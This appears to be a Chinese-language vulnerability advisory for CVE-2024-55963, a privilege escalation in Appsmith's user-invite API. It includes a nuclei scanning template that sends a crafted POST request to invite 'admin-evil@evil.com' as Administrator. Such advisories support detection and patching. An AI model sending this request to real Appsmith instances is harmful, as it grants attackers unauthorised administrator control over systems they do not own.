Appsmith 权限提升漏洞

漏洞信息

漏洞名称: Appsmith 权限提升漏洞

漏洞编号:

  • CVE: CVE-2024-55963

漏洞类型: 权限提升

漏洞等级: 高危

漏洞描述: Appsmith是一个开源的内部工具构建平台,允许开发者快速构建管理面板、CRUD应用和自定义工作流程。它广泛应用于企业内部,用于数据可视化和操作自动化。该漏洞存在于Appsmith的/api/v1/users/invite接口中,攻击者可以通过发送特制的POST请求,尝试邀请一个新用户并赋予其管理员权限。这暴露了访问控制机制的缺陷,即系统未能正确验证请求者的权限,导致权限提升。成功利用此漏洞的攻击者可以在未经授权的情况下获得管理员权限,从而完全控制Appsmith实例。此漏洞的利用需要有效的认证令牌,这意味着攻击者需要先获得一定的访问权限。尽管如此,一旦利用成功,攻击者可以执行任意操作,包括数据泄露、服务中断等,对企业内部安全构成严重威胁。

产品厂商: Appsmith

产品名称: Appsmith

来源: https://github.com/projectdiscovery/nuclei-templates/blob/0ae90e5259996697fd6f02b0ce37eea8a6927c2b/appsmith-privilege-escalation-attempt.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

id: appsmith-privilege-escalation-attempt

info:
name: Appsmith - Privilege Escalation via /users/invite
author: saikir4n
severity: high
description: >
Attempts to invite a user as Administrator using /api/v1/users/invite.
If successful, it indicates broken access control.
Requires valid authentication tokens to work.
reference:
- https://rhinosecuritylabs.com/research/cve-2024-55963-appsmith-rce/
tags: appsmith,authz,privilege-escalation

requests:
- raw:
- |
POST /api/v1/users/invite HTTP/1.1
Host: {{Hostname}}
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/applications
Content-Type: application/json
X-XSRF-TOKEN: {{xsrf_token}}
Cookie: XSRF-TOKEN={{xsrf_token}}; SESSION={{session_id}}
Content-Length: 107

{
"email": "admin-evil@evil.com",
"usernames": ["admin-evil"],
"roleNames": ["Administrator"]
}

attack: pitchfork
payloads:
xsrf_token:
- REPLACE_XSRF_TOKEN
session_id:
- REPLACE_SESSION_ID

matchers:
- type: status
status:
- 200
- 201

matchers-condition: and